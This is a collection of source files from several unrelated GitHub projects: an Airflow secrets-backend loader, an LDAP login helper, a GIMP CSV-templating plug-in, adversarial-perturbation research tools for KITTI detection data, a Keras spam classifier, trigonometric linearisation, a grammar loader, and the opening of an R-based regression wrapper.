{
"source": "jjmurre/airflow",
"score": 2
}
#### File: airflow/secrets/__init__.py
```python
__all__ = ['BaseSecretsBackend', 'get_connections']
import json
from abc import ABC, abstractmethod
from json import JSONDecodeError
from typing import List
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.models import Connection
from airflow.utils.module_loading import import_string
CONFIG_SECTION = "secrets"
DEFAULT_SECRETS_SEARCH_PATH = [
"airflow.secrets.environment_variables.EnvironmentVariablesSecretsBackend",
"airflow.secrets.metastore.MetastoreSecretsBackend",
]
class BaseSecretsBackend(ABC):
"""
Abstract base class to retrieve secrets given a conn_id and construct a Connection object
"""
def __init__(self, **kwargs):
pass
@abstractmethod
def get_connections(self, conn_id) -> List[Connection]:
"""
Return list of connection objects matching a given ``conn_id``.
:param conn_id: connection id to search for
        :return: list of matching connections
"""
def get_connections(conn_id: str) -> List[Connection]:
"""
Get all connections as an iterable.
:param conn_id: connection id
:return: array of connections
"""
for secrets_backend in ensure_secrets_loaded():
conn_list = secrets_backend.get_connections(conn_id=conn_id)
if conn_list:
return list(conn_list)
raise AirflowException("The conn_id `{0}` isn't defined".format(conn_id))
def initialize_secrets_backends() -> List[BaseSecretsBackend]:
"""
* import secrets backend classes
* instantiate them and return them in a list
"""
alternative_secrets_backend = conf.get(section=CONFIG_SECTION, key='backend', fallback='')
try:
alternative_secrets_config_dict = json.loads(
conf.get(section=CONFIG_SECTION, key='backend_kwargs', fallback='{}')
)
except JSONDecodeError:
alternative_secrets_config_dict = {}
backend_list = []
if alternative_secrets_backend:
secrets_backend_cls = import_string(alternative_secrets_backend)
backend_list.append(secrets_backend_cls(**alternative_secrets_config_dict))
for class_name in DEFAULT_SECRETS_SEARCH_PATH:
secrets_backend_cls = import_string(class_name)
backend_list.append(secrets_backend_cls())
return backend_list
def ensure_secrets_loaded() -> List[BaseSecretsBackend]:
"""
Ensure that all secrets backends are loaded.
If the secrets_backend_list contains only 2 default backends, reload it.
"""
# Check if the secrets_backend_list contains only 2 default backends
if len(secrets_backend_list) == 2:
return initialize_secrets_backends()
return secrets_backend_list
secrets_backend_list = initialize_secrets_backends()
```
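A minimal sketch of how a custom backend could plug into this module, using the `[secrets]` config section read above; the class name and connection values below are hypothetical:

```python
from typing import List

from airflow.models import Connection
from airflow.secrets import BaseSecretsBackend


class DictSecretsBackend(BaseSecretsBackend):
    """Hypothetical backend serving connections from an in-memory dict."""

    def __init__(self, connections=None, **kwargs):
        super().__init__(**kwargs)
        self._connections = connections or {}

    def get_connections(self, conn_id) -> List[Connection]:
        uri = self._connections.get(conn_id)
        return [Connection(conn_id=conn_id, uri=uri)] if uri else []

# Wired in via airflow.cfg, matching the conf.get() calls above:
#   [secrets]
#   backend = my_pkg.DictSecretsBackend
#   backend_kwargs = {"connections": {"my_db": "postgres://host/db"}}
```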
{
"source": "jjmutumi/flask-active-directory",
"score": 3
}
#### File: jjmutumi/flask-active-directory/models.py
```python
import ldap3
def authenticate(server_uri, domain, username, password):
    # Build the bind DN, e.g. "cn=jdoe,dc=example,dc=local".
    user_dn = ",".join(
        ["cn=" + username] + ["dc=" + dc for dc in domain.split(".")]
    )
    server = ldap3.Server(server_uri, get_info=ldap3.ALL)
    connection = ldap3.Connection(server, user=user_dn, password=password)
    if not connection.bind():
        raise ValueError("Invalid credentials")
    connection.unbind()
    return True
```
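A usage sketch; the server URI, domain, and credentials below are placeholders:

```python
# All values here are hypothetical.
try:
    authenticate("ldap://dc1.example.local", "example.local", "jdoe", "s3cret")
    print("Login OK")
except ValueError:
    print("Login rejected")
```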
{
"source": "jjmutumi/gimp-variable-data",
"score": 3
}
#### File: jjmutumi/gimp-variable-data/variable_data.py
```python
from gimpfu import *
import csv
import os
def get_text_layers(image):
    # In an RGB image, text layers carry alpha, i.e. type RGBA_IMAGE (1).
    return {layer.name: layer for layer in image.layers if layer.type == 1}
def get_top_most_drawable(image):
    # First plain RGB layer (type RGB_IMAGE == 0) from the top of the stack.
    for layer in image.layers:
        if layer.type == 0:
            return layer
def get_paths(image):
return {vector.name: vector for vector in image.vectors}
def get_filename_for(row):
return row[0]
def get_template_variable_for(template_variables, row_index, column_index):
return template_variables[column_index]
def variable_data(image, csv_filename, pdf_directory, pdf_filename):
images = [] # saved list of generated images
    template_variables = []  # column names from the CSV header row
# for each line in the csv
with open(csv_filename, "rb") as csv_file:
row_count = sum(1 for row in csv_file) - 1
csv_file.seek(0)
for rindex, row in enumerate(csv.reader(csv_file)):
if rindex == 0:
template_variables = row[1:]
continue
new_image = image.duplicate()
filename = get_filename_for(row)
text_layers = get_text_layers(new_image)
paths = get_paths(new_image)
drawable = get_top_most_drawable(new_image)
# fill-in the template parameters
for cindex, color in enumerate(row[1:]):
template_variable = get_template_variable_for(template_variables, rindex, cindex)
if template_variable in text_layers:
text_layer = text_layers[template_variable]
gimp.pdb.gimp_text_layer_set_color(text_layer, color)
elif template_variable in paths:
path = paths[template_variable]
path.to_selection()
gimp.pdb.gimp_image_get_selection(new_image)
gimp.pdb.gimp_context_set_background(color)
gimp.pdb.gimp_edit_bucket_fill(drawable, 1, 0, 100, 0, 0, 0, 0)
dirname = os.path.dirname(os.path.abspath(filename))
if not os.path.isdir(dirname):
os.makedirs(dirname)
gimp.pdb.file_pdf_save(new_image, new_image.merge_visible_layers(0), filename, filename, 0, 1, 1)
images.append(new_image)
# progress bar
gimp.pdb.gimp_progress_update( (rindex) / float(row_count))
gimp.pdb.gimp_progress_set_text("%s of %s" % (rindex, row_count))
# lastly save the pdf
pdf_filename = os.path.join(pdf_directory, pdf_filename)
gimp.pdb.file_pdf_save_multi([image.ID for image in images], len(images), 0, 0, 0, pdf_filename, pdf_filename)
register(
"joseph_n_m_variable_data",
"Variable data",
"Populate an image path and text layers with columns from CSV",
"<NAME>.",
"<NAME>.",
"2018",
"Variable Data (CSV)...",
"*",
[
(PF_IMAGE, "image", "", ""),
(PF_FILENAME, "csv_filename", "Input CSV (*.csv):", ""),
(PF_DIRNAME, "pdf_directory", "PDF directory:", ""),
(PF_STRING, "pdf_filename", "PDF file name:", "out.pdf"),
],
[],
variable_data, menu="<Image>/File/Create")
main()
```
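For reference, a sketch of the CSV layout the plug-in expects, inferred from `get_filename_for()` and the header handling above (file names and colors are made up):

```python
# Hypothetical input CSV, as consumed by variable_data():
#
#   filename,headline,badge
#   out/card_01.pdf,#ff0000,#0000ff
#   out/card_02.pdf,#00ff00,#ffff00
#
# Row 0 holds the template variable names (everything after the first
# column); they must match text-layer or path names in the template image.
# Each following row duplicates the image, recolors the matching text
# layers and path fills with the row's values, and saves to column 0's path.
```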
{
"source": "jjn037/FusionAttack",
"score": 2
}
#### File: FusionAttack/tools/save_data.py
```python
import _init_path
import numpy as np
import os
import argparse
import lib.utils.calibration as calibration
from lib.config import cfg, cfg_from_file, cfg_from_list
from PIL import Image
import scipy.io as sio
from sklearn.cross_decomposition import CCA
from sklearn.decomposition import PCA
import joblib
parser = argparse.ArgumentParser(description = "arg parser")
parser.add_argument('--cfg_file', type = str, default = 'cfgs/LI_Fusion_with_attention_use_ce_loss.yaml',
help = 'specify the config for training')
parser.add_argument('--out_dir', type = str, default = None)
parser.add_argument('--set', dest = 'set_cfgs', default = None, nargs = argparse.REMAINDER,
help = 'set extra config keys if needed')
parser.add_argument('--cca_suffix', type = str, default = None)
parser.add_argument('--cca_n', type=int, default=512)
parser.add_argument('--cca_mi', type=int, default=1000)
parser.add_argument('--ridge', action = 'store_true', default = False)
parser.add_argument('--lamda', type=float, default=0.1)
parser.add_argument('--ridge_suffix', type = str, default = None)
args = parser.parse_args()
class save_kitti(object):
def __init__(self, out_dir, save_choice=False, save_np=False, save_mat=False, n_samples=0, load=False):
root_dir = os.path.join('../', 'data')
self.imageset_dir = os.path.join(root_dir, 'KITTI', 'object', 'training')
split_dir = os.path.join(root_dir, 'KITTI', 'ImageSets', 'train.txt')
self.image_idx_list = [x.strip() for x in open(split_dir).readlines()]
self.sample_id_list = [int(sample_id) for sample_id in self.image_idx_list]
self.image_dir = os.path.join(self.imageset_dir, 'image_2')
self.lidar_dir = os.path.join(self.imageset_dir, 'velodyne')
self.calib_dir = os.path.join(self.imageset_dir, 'calib')
self.out_dir = out_dir
self.choice_dir = os.path.join(self.out_dir, 'choice')
os.makedirs(self.choice_dir, exist_ok=True)
self.save_choice = save_choice
self.save_np = save_np
self.save_mat = save_mat
self.n_samples = n_samples
self.load = load
self.mean = [0.485, 0.456, 0.406]
self.std = [0.229, 0.224, 0.225]
self.npoints = 16384
def get_calib(self, idx):
calib_file = os.path.join(self.calib_dir, '%06d.txt' % idx)
assert os.path.exists(calib_file)
return calibration.Calibration(calib_file)
def get_image_rgb(self, idx, vis=False):
"""
return img with normalization in rgb mode
:param idx:
:return: imback(H,W,3)
"""
img_file = os.path.join(self.image_dir, '%06d.png' % idx)
assert os.path.exists(img_file)
im = Image.open(img_file).convert('RGB')
        im = np.array(im).astype(np.float64)  # np.float was removed in NumPy 1.24
im = im / 255.0
im -= self.mean
im /= self.std
# print(im.shape)
# ~[-2,2]
# im = im[:, :, ::-1]
# make same size padding with 0
        imback = np.zeros([384, 1280, 3], dtype=np.float64)
imback[:im.shape[0], :im.shape[1], :] = im
if vis:
return imback, im.shape[0], im.shape[1]
else:
return imback # (H,W,3) RGB mode
def get_image_shape(self, idx):
img_file = os.path.join(self.image_dir, '%06d.png' % idx)
assert os.path.exists(img_file)
im = Image.open(img_file)
width, height = im.size
return height, width, 3
def get_lidar(self, idx):
lidar_file = os.path.join(self.lidar_dir, '%06d.bin' % idx)
assert os.path.exists(lidar_file)
return np.fromfile(lidar_file, dtype = np.float32).reshape(-1, 4)
@staticmethod
def get_valid_flag(pts_rect, pts_img, pts_rect_depth, img_shape):
"""
Valid point should be in the image (and in the PC_AREA_SCOPE)
:param pts_rect:
:param pts_img:
:param pts_rect_depth:
:param img_shape:
:return:
"""
val_flag_1 = np.logical_and(pts_img[:, 0] >= 0, pts_img[:, 0] < img_shape[1])
val_flag_2 = np.logical_and(pts_img[:, 1] >= 0, pts_img[:, 1] < img_shape[0])
val_flag_merge = np.logical_and(val_flag_1, val_flag_2)
pts_valid_flag = np.logical_and(val_flag_merge, pts_rect_depth >= 0)
if cfg.PC_REDUCE_BY_RANGE:
x_range, y_range, z_range = cfg.PC_AREA_SCOPE
pts_x, pts_y, pts_z = pts_rect[:, 0], pts_rect[:, 1], pts_rect[:, 2]
range_flag = (pts_x >= x_range[0]) & (pts_x <= x_range[1]) \
& (pts_y >= y_range[0]) & (pts_y <= y_range[1]) \
& (pts_z >= z_range[0]) & (pts_z <= z_range[1])
pts_valid_flag = pts_valid_flag & range_flag
return pts_valid_flag
def save_all(self):
if self.load:
print('loading...')
img_file = os.path.join(self.out_dir, 'img_all.npy')
pts_file = os.path.join(self.out_dir, 'pts_all.npy')
img_all_np = np.load(img_file)
pts_all_np = np.load(pts_file)
print('loaded')
else:
img_all = []
pts_all = []
i = 0
for sample_id in self.sample_id_list:
if i >= self.n_samples > 0:
break
if i % 100 == 0:
print('processing: %d' % i)
calib = self.get_calib(sample_id)
img = self.get_image_rgb(sample_id)
img_shape = self.get_image_shape(sample_id)
pts_lidar = self.get_lidar(sample_id)
# get valid point (projected points should be in image)
pts_rect = calib.lidar_to_rect(pts_lidar[:, 0:3])
# pts_intensity = pts_lidar[:, 3]
pts_img, pts_rect_depth = calib.rect_to_img(pts_rect)
pts_valid_flag = self.get_valid_flag(pts_rect, pts_img, pts_rect_depth, img_shape)
pts_rect = pts_rect[pts_valid_flag][:, 0:3]
# pts_intensity = pts_intensity[pts_valid_flag]
# pts_origin_xy = pts_img[pts_valid_flag]
if self.save_choice:
if self.npoints < len(pts_rect):
pts_depth = pts_rect[:, 2]
pts_near_flag = pts_depth < 40.0
far_idxs_choice = np.where(pts_near_flag == 0)[0]
near_idxs = np.where(pts_near_flag == 1)[0]
near_idxs_choice = np.random.choice(near_idxs, self.npoints - len(far_idxs_choice),
replace=False)
choice = np.concatenate((near_idxs_choice, far_idxs_choice), axis=0) \
if len(far_idxs_choice) > 0 else near_idxs_choice
np.random.shuffle(choice)
else:
choice = np.arange(0, len(pts_rect), dtype=np.int32)
if self.npoints > len(pts_rect):
extra_choice = np.random.choice(choice, self.npoints - len(pts_rect), replace=False)
choice = np.concatenate((choice, extra_choice), axis=0)
np.random.shuffle(choice)
choice_file = os.path.join(self.choice_dir, '%06d.npy' % sample_id)
np.save(choice_file, choice)
else:
choice_file = os.path.join(self.choice_dir, '%06d.npy' % sample_id)
choice = np.load(choice_file)
ret_pts_rect = pts_rect[choice, :]
img_all.append(img.reshape(1, -1))
pts_all.append(ret_pts_rect.reshape(1, -1))
i += 1
print('saving...')
img_all_np = np.concatenate(img_all)
pts_all_np = np.concatenate(pts_all)
if self.save_np:
img_file = os.path.join(self.out_dir, 'img_%d.npy' % self.n_samples)
np.save(img_file, img_all_np)
pts_file = os.path.join(self.out_dir, 'pts_%d.npy' % self.n_samples)
np.save(pts_file, pts_all_np)
if self.save_mat:
img_mat = os.path.join(self.out_dir, 'img_%d.mat' % self.n_samples)
sio.savemat(img_mat, {'img_all': img_all_np})
pts_mat = os.path.join(self.out_dir, 'pts_%d.mat' % self.n_samples)
sio.savemat(pts_mat, {'pts_all': pts_all_np})
print('saved')
if args.ridge:
print('loading pca1...')
pca1_file = os.path.join(self.out_dir, 'pca_img_0_%s.m' % args.cca_suffix)
pca1 = joblib.load(pca1_file)
print('ridge regression...')
img_pca = pca1.transform(img_all_np)
e = np.identity(3000)
r1 = np.dot(img_pca.T, img_pca) + args.lamda * e
p = np.dot(np.dot(np.linalg.inv(r1), img_pca.T), pts_all_np)
ridge_file = os.path.join(self.out_dir, 'ridge_%s.npy' % args.ridge_suffix)
np.save(ridge_file, p)
else:
if self.load:
print('loading pca1...')
pca1_file = os.path.join(self.out_dir, 'pca_img_0_n128mi1500.m')
pca1 = joblib.load(pca1_file)
img_all_np_pca = pca1.transform(img_all_np)
print('loading pca2...')
pca2_file = os.path.join(self.out_dir, 'pca_pts_0_n128mi1500.m')
pca2 = joblib.load(pca2_file)
pts_all_np_pca = pca2.transform(pts_all_np)
else:
print('PCA1...')
pca1 = PCA(n_components=3000)
img_all_np_pca = pca1.fit_transform(img_all_np)
pca_file = os.path.join(self.out_dir, 'pca_img_%d_%s.m' % (self.n_samples, args.cca_suffix))
joblib.dump(pca1, pca_file)
print('PCA2...')
pca2 = PCA(n_components=3000)
pts_all_np_pca = pca2.fit_transform(pts_all_np)
pca_file = os.path.join(self.out_dir, 'pca_pts_%d_%s.m' % (self.n_samples, args.cca_suffix))
joblib.dump(pca2, pca_file)
print('CCA...')
cca = CCA(n_components=args.cca_n, max_iter=args.cca_mi)
cca.fit(img_all_np_pca, pts_all_np_pca)
cca_file = os.path.join(self.out_dir, 'cca2_%d_%s.m' % (self.n_samples, args.cca_suffix))
joblib.dump(cca, cca_file)
# cca = rcca.CCA(kernelcca=False, reg=0., numCC=2)
# cca.train([img_all_np, pts_all_np])
# cca_file = os.path.join(self.out_dir, 'rcca_%d.h5' % self.n_samples)
# cca.save(cca_file)
print('done')
if __name__ == '__main__':
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
assert args.out_dir is not None
os.makedirs(args.out_dir, exist_ok=True)
dataset = save_kitti(args.out_dir, save_choice=False, save_np=False, save_mat=False, n_samples=0, load=True)
dataset.save_all()
```
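As a side note, the `--ridge` branch in `save_all()` evaluates the closed-form ridge-regression estimator on the PCA-projected images; in the notation below, X is `img_pca`, Y is `pts_all_np`, and λ is the `--lamda` argument:

```latex
\hat{P} = \left( X^{\top} X + \lambda I \right)^{-1} X^{\top} Y
```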
#### File: FusionAttack/tools/vis_img_adv.py
```python
import _init_path
import os
import numpy as np
import pickle
import torch
from torch.nn.functional import grid_sample
import lib.utils.roipool3d.roipool3d_utils as roipool3d_utils
from lib.datasets.kitti_dataset import KittiDataset
import argparse
from lib.datasets.kitti_rcnn_dataset import interpolate_img_by_xy
parser = argparse.ArgumentParser()
parser.add_argument('--save_dir', type = str, default = './log/data_adv')
parser.add_argument('--class_name', type = str, default = 'Car')
parser.add_argument('--split', type = str, default = 'val')
parser.add_argument("--adv_ckpt_dir", type = str, default = None)
parser.add_argument("--adv_iter", type = int, default = 100)
parser.add_argument('--noise', action = 'store_true', default = False)
parser.add_argument('--fusion', action = 'store_true', default = False)
args = parser.parse_args()
# import cv2
from lib.config import cfg
from lib.net.GAN_model import Generator_img, Generator_fusimg
from lib.net.train_functions import reduce_sum
from PIL import Image
class GTDatabaseGenerator(KittiDataset):
def __init__(self, root_dir, split = 'val', classes = args.class_name):
super().__init__(root_dir, split = split)
self.gt_database = None
if classes == 'Car':
self.classes = ('Background', 'Car')
elif classes == 'People':
self.classes = ('Background', 'Pedestrian', 'Cyclist')
elif classes == 'Pedestrian':
self.classes = ('Background', 'Pedestrian')
elif classes == 'Cyclist':
self.classes = ('Background', 'Cyclist')
else:
assert False, "Invalid classes: %s" % classes
# self.velodyne_rgb_dir = os.path.join(root_dir, 'KITTI/object/training/velodyne_rgb')
# # if not os.path.exists(self.velodyne_rgb_dir):
# os.makedirs(self.velodyne_rgb_dir, exist_ok = True)
if args.fusion:
self.generator = Generator_fusimg(num_channels=3, ngf=100)
else:
self.generator = Generator_img(num_channels=3, ngf=100)
self.generator.cuda()
print("==> Loading generator")
aimg_ckpt = os.path.join(args.adv_ckpt_dir, 'checkpoint_Gimg_iter_%d.pth' % args.adv_iter)
checkpoint = torch.load(aimg_ckpt)
self.generator.load_state_dict(checkpoint['model_state'])
self.generator.eval()
img_mean = np.array([0.485, 0.456, 0.406])
img_std = np.array([0.229, 0.224, 0.225])
self.clamp_max = (1. - img_mean) / img_std
self.clamp_min = - img_mean / img_std
def __len__(self):
raise NotImplementedError
def __getitem__(self, item):
raise NotImplementedError
def filtrate_objects(self, obj_list):
valid_obj_list = []
for obj in obj_list:
if obj.cls_type not in self.classes:
continue
if obj.level_str not in ['Easy', 'Moderate', 'Hard']:
continue
valid_obj_list.append(obj)
return valid_obj_list
@staticmethod
def get_valid_flag(pts_rect, pts_img, pts_rect_depth, img_shape):
"""
Valid point should be in the image (and in the PC_AREA_SCOPE)
:param pts_rect:
:param pts_img:
:param pts_rect_depth:
:param img_shape:
:return:
"""
val_flag_1 = np.logical_and(pts_img[:, 0] >= 0, pts_img[:, 0] < img_shape[1])
val_flag_2 = np.logical_and(pts_img[:, 1] >= 0, pts_img[:, 1] < img_shape[0])
val_flag_merge = np.logical_and(val_flag_1, val_flag_2)
pts_valid_flag = np.logical_and(val_flag_merge, pts_rect_depth >= 0)
if cfg.PC_REDUCE_BY_RANGE:
x_range, y_range, z_range = cfg.PC_AREA_SCOPE
pts_x, pts_y, pts_z = pts_rect[:, 0], pts_rect[:, 1], pts_rect[:, 2]
range_flag = (pts_x >= x_range[0]) & (pts_x <= x_range[1]) \
& (pts_y >= y_range[0]) & (pts_y <= y_range[1]) \
& (pts_z >= z_range[0]) & (pts_z <= z_range[1])
pts_valid_flag = pts_valid_flag & range_flag
return pts_valid_flag
def vis_img(self, sample_id):
gt_database = []
sample_id = int(sample_id)
print('process gt sample (id=%06d)' % sample_id)
# (H,W,3)
img, h, w = self.get_image_rgb_with_normal(sample_id, vis=True)
if args.noise:
img = img + args.pert
img = torch.from_numpy(img).unsqueeze(0).cuda(non_blocking=True).float().permute((0, 3, 1, 2))
img_r = torch.zeros_like(img).cuda()
for j in range(3):
img_r[:, j, :, :] = torch.clamp(img[:, j, :, :], min=self.clamp_min[j], max=self.clamp_max[j])
pert_dist = np.sum(args.pert ** 2)
pert_dist_r = torch.mean(reduce_sum((img_r - img) ** 2))
img_gen = img_r.permute((0, 2, 3, 1)).squeeze(0).cpu().numpy()
else:
img_ori = torch.from_numpy(img).unsqueeze(0).cuda(non_blocking=True).float().permute((0, 3, 1, 2))
if args.fusion:
img_pert, _ = self.generator(img_ori)
else:
img_pert = self.generator(img_ori)
pert_dist = torch.mean(reduce_sum(img_pert ** 2))
adv_img = img_ori + img_pert
adv_img_r = torch.zeros_like(img_ori).cuda()
for j in range(3):
adv_img_r[:, j, :, :] = torch.clamp(adv_img[:, j, :, :], min=self.clamp_min[j], max=self.clamp_max[j])
pert_dist_r = torch.mean(reduce_sum((adv_img_r - img_ori) ** 2))
img_gen = adv_img_r.permute((0, 2, 3, 1)).squeeze(0).cpu().numpy()
img_gen = ((img_gen * self.std + self.mean) * 255)
img_gen = img_gen.astype(np.uint8)
img_gen = img_gen[:h, :w, :]
img_save = Image.fromarray(img_gen)
img_file = os.path.join(args.save_dir, '%06d_adv.png' % sample_id)
img_save.save(img_file)
print('pert img dist: %f' % pert_dist)
print('pert img dist refined: %f' % pert_dist_r)
input('Pause: ')
if __name__ == '__main__':
dataset = GTDatabaseGenerator(root_dir = '../data/', split = args.split)
os.makedirs(args.save_dir, exist_ok = True)
if args.noise:
args.pert = np.random.normal(0.0, 0.2, size=(384, 1280, 3))
pert_file = os.path.join(args.save_dir, 'pert.npy')
np.save(pert_file, args.pert)
with torch.no_grad():
while True:
idx = input('sample id:')
if idx == '':
break
dataset.vis_img(idx)
# gt_database = pickle.load(open('gt_database/train_gt_database.pkl', 'rb'))
# print(gt_database.__len__())
# import pdb
# pdb.set_trace()
```
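A small standalone check (not part of the repo) of the clamp bounds used above: they are exactly the normalized images of pixel values 0 and 1, so any clamped adversarial image maps back into the valid pixel range:

```python
import numpy as np

mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
clamp_min = -mean / std
clamp_max = (1.0 - mean) / std
# De-normalizing the bounds recovers the [0, 1] pixel range per channel.
assert np.allclose(clamp_min * std + mean, 0.0)
assert np.allclose(clamp_max * std + mean, 1.0)
```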
{
"source": "jjnp/dss20-ue1",
"score": 3
}
#### File: jjnp/dss20-ue1/main.py
```python
from numpy.random import seed
# Set seed value used by Keras for reproducible results
seed(42)
import pandas as pd
import numpy as np
import sys
from keras.preprocessing.text import Tokenizer
from keras import models
from keras import layers
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
from numpy import zeros
def token_to_vector(sequences, size=10000):
results = zeros((len(sequences), size))
for i, sequence in enumerate(sequences):
results[i, sequence] = 1
return results
def class_label_to_vector(class_labels):
results = zeros(len(class_labels))
for i, label in enumerate(class_labels):
if (label.lower() == 'spam'):
results[i] = 1
return results
rawdata = pd.read_csv('input_data.csv', encoding='cp1250')
rawdata = rawdata.dropna(axis='columns')
X = rawdata['v2']
y = rawdata['v1']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=40)
print('Tokenizing text')
tokenizer = Tokenizer(num_words=10000)  # cap indices so they fit the 10000-dim vectors below
tokenizer.fit_on_texts(X_train)
X_train_tokenized = tokenizer.texts_to_sequences(X_train)
X_test_tokenized = tokenizer.texts_to_sequences(X_test)
print('Vectorizing tokenized text')
x_train = token_to_vector(X_train_tokenized, 10000)
x_test = token_to_vector(X_test_tokenized, 10000)
y_train = class_label_to_vector(y_train)
y_test = class_label_to_vector(y_test)
if len(sys.argv) > 1:
print('Writing preprocessed data to disk...')
print('This may take a while depending on the speed of your disk and computer so stay patient!')
train_x_df = pd.DataFrame(x_train)
train_x_df.to_csv('results/training_input.csv')
test_x_df = pd.DataFrame(x_test)
test_x_df.to_csv('results/test_input.csv')
train_y_df = pd.DataFrame(y_train)
train_y_df.to_csv('results/training_labels.csv')
test_y_df = pd.DataFrame(y_test)
test_y_df.to_csv('results/test_labels.csv')
print('Finished writing preprocessed data to disk')
print('Starting model fitting...')
model = models.Sequential()
model.add(layers.Dense(4, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(4, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
history = model.fit(x_train,y_train,epochs=20,batch_size=100,validation_split=0.5)
# visualisation
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy Score')
plt.xlabel('Epochs')
plt.legend(['training', 'validation'], loc='lower right')
plt.savefig('results/accuracy_epoch.png')
plt.close()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss function')
plt.ylabel('Loss')
plt.xlabel('Epochs')
plt.legend(['training', 'validation'], loc='upper right')
plt.savefig('results/loss_epoch.png')
results = model.evaluate(x_test, y_test)
outputfile = open('results/results.txt', 'w+')
outputfile.write('Final results after training for 20 Epochs\n')
outputfile.write('Accuracy: %s\n' % (results[1]))
outputfile.write('Loss: %s\n' % (results[0]))
outputfile.flush()
outputfile.close()
print('DONE')
```
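To illustrate what `token_to_vector()` produces, a tiny self-contained example (toy sequences, size 10 instead of 10000):

```python
from numpy import zeros

sequences = [[3, 7], [1, 3, 9]]
vectors = zeros((len(sequences), 10))
for i, seq in enumerate(sequences):
    vectors[i, seq] = 1  # multi-hot: 1 wherever a token index occurs
print(vectors[0])  # [0. 0. 0. 1. 0. 0. 0. 1. 0. 0.]
```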
{
"source": "jjoaosilva/TransformadaDiscretaDeFourrier",
"score": 4
}
#### File: Linearizacao/testeDektop/teste.py
```python
from math import sin
def senoL(num):
if num >= 0 and num <= 0.5:
return 0.958800*num + 0.000000
elif num > 0.5 and num <= 1:
return 0.724200*num + 0.117300
elif num > 1 and num <= 1.5:
return 0.312000*num + 0.529500
elif num > 1.5 and num <= 2:
return -0.176400*num + 1.262100
elif num > 2 and num <= 2.5:
return -0.621600*num + 2.152500
elif num > 2.5 and num <= 4:
return -0.903533*num + 2.857333
elif num > 4 and num <= 4.5:
return -0.441400*num + 1.008800
elif num > 4.5 and num <= 5:
return 0.037200*num - 1.144900
elif num > 5 and num <= 5.5:
return 0.506800*num - 3.492900
elif num > 5.5 and num <= 6:
return 0.852200*num - 5.392600
else:
return 100000
def cossenoL(num):
if num >= 0 and num <= 0.5:
return -0.244800*num + 1.000000
elif num > 0.5 and num <= 1:
return -0.674600*num + 1.214900
    elif num > 1 and num <= 2.5:
        return -0.894267*num + 1.434567
    elif num > 2.5 and num <= 3:
        return -0.377800*num + 0.143400
    elif num > 3 and num <= 3.5:
        return 0.107000*num - 1.311000
    elif num > 3.5 and num <= 4:
        return 0.565800*num - 2.916800
    elif num > 4 and num <= 5.5:
        return 0.908200*num - 4.286400
    elif num > 5.5 and num <= 6:
        return 10.493200*num - 61.999000
else:
return 100000
while True:
    num = float(input("Enter a value: "))
    print("sin: %f vs. senoL: %f" % (sin(num), senoL(num)))
```
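The hard-coded coefficients can be reproduced as chords of sin(x) over each segment; a sketch of the derivation (the endpoints match the branches of `senoL`):

```python
from math import sin

def chord(a, b):
    # Linear interpolation of sin(x) between the endpoints a and b.
    slope = (sin(b) - sin(a)) / (b - a)
    intercept = sin(a) - slope * a
    return slope, intercept

print(chord(0.0, 0.5))  # ~(0.9589, 0.0000), the first branch of senoL
```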
{
"source": "jjoaovitor7/lfa_trabalhopratico2_20212",
"score": 4
}
#### File: lfa_trabalhopratico2_20212/src/Grammar.py
```python
class Grammar(object):
    def __init__(self, file):
        """
        Instantiation creates an empty grammar; a predefined value
        could be injected here instead.

        Parameters
        ----------
        file : file object
        """
        self._file = file
        self.grammar = dict()  # instance attribute, not shared between objects
    def load(self):
        """Load the grammar."""
        for line in self._file:
            # Extract the key (left-hand side of "=>").
            key = line.split("=>")
            key_format = key[0].replace(" ", "")
            # Strip spaces and newlines from the right-hand side.
            rhs = "".join(s for s in key[1] if s not in (" ", "\n"))
            # Extract the key's values ('|' separates alternatives).
            for value in rhs.split("|"):
                self.grammar.setdefault(key_format, []).append(value)
    def get(self):
        """Return the grammar."""
        return self.grammar
    def print(self):
        """Print the grammar."""
        print(self.grammar)
```
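A usage sketch, assuming a plain-text grammar file with one production per line in the `A => x | y` format parsed by `load()` (the filename is hypothetical):

```python
# grammar.txt (hypothetical):
#   S => aSb | ab
with open("grammar.txt") as f:
    g = Grammar(f)
    g.load()
    print(g.get())  # {'S': ['aSb', 'ab']}
```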
{
"source": "jjobel/CluStR",
"score": 3
}
#### File: jjobel/CluStR/reglib.py
```python
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
import numpy as np
import linmix
# Imports the necessary R packages needed to run lrgs in python
RLRGS = importr('lrgs') # Multivariate regression package by <NAME>
# Set some aliases for useful R functions
RARRAY = robjects.r('array')
RMATRIX = robjects.r('matrix')
RNORM = robjects.r('rnorm')
RC = robjects.r('c')
RLM = robjects.r('lm')
# pylint: disable=invalid-name
def run_lrgs(x, y, err_x, err_y, _xycov=None, nmc=500, dirichlet=True):
'''
Runs the lrgs regression algorithm written in R by interfacing through
rpy2. For our purposes, inputs should be in scaled (log) form. (For the
moment, only works for on-diagonal elements of the covariance matrix.) nmc
is the length of the markov chain.
'''
# pylint: disable = too-many-arguments
# pylint: disable = too-many-locals
# Make sure dimensions are correct
assert np.size(x) == np.size(y)
assert np.size(err_x) == np.size(err_y)
assert np.size(x) == np.size(err_x)
# Convert x and y to r vectors
rx = robjects.FloatVector(x)
ry = robjects.FloatVector(y)
rx_err = robjects.FloatVector(err_x)
ry_err = robjects.FloatVector(err_y)
# Set up covariance matrix
M = RARRAY(0.0, dim=RC(2, 2, np.size(rx)))
for i in range(np.size(rx)):
M.rx[1, 1, i+1] = rx_err[i]
M.rx[2, 2, i+1] = ry_err[i]
# Set some R equivalents
TRUE = robjects.BoolVector([True])
FALSE = robjects.BoolVector([False])
if dirichlet:
d = TRUE
else:
d = FALSE
# Run MCMC
posterior = RLRGS.Gibbs_regression(rx, ry, M, nmc, dirichlet=d,
trace='bsg', mention_every=50)
# Extract relevant data from posterior
B = np.array(posterior[0]) # Parameter chain
